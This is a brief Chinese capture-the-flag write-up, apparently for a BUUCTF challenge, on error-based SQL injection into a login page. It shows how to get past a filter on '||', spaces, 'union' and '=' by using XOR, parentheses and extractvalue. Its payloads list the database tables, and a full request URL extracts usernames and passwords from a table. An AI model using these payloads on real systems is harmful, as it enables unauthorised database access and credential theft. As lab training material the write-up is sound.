一,寻找闭合符’
发现过滤 || 空格 union =
可用 extractvalue updatexml 函数进行报错注入
二,绕过
对|| 可以使用^异或进行注入
对空格 可以 /**/ %0a %0a 等等 尝试后不可使用则使用()来进行绕过
第一种:
admin'^extractvalue(1,concat(0x5c,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like('geek'))))%23
第二种:
admin'^extractvalue(1,concat(0x5c,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like('geek'))))or'1;%00
三 extractvalue长度限制
extractvalue只显示23长度字符串,会导致flag显示不全
可以使用right 函数显示右半部分的值
http://c636cc8b-2dad-4d50-8e21-e2762cc56c95.node4.buuoj.cn:81/check.php?username=admin&password=admin'^extractvalue(1,right(concat(0x7c,(select(group_concat(username,password))from(H4rDsq1))),23))%23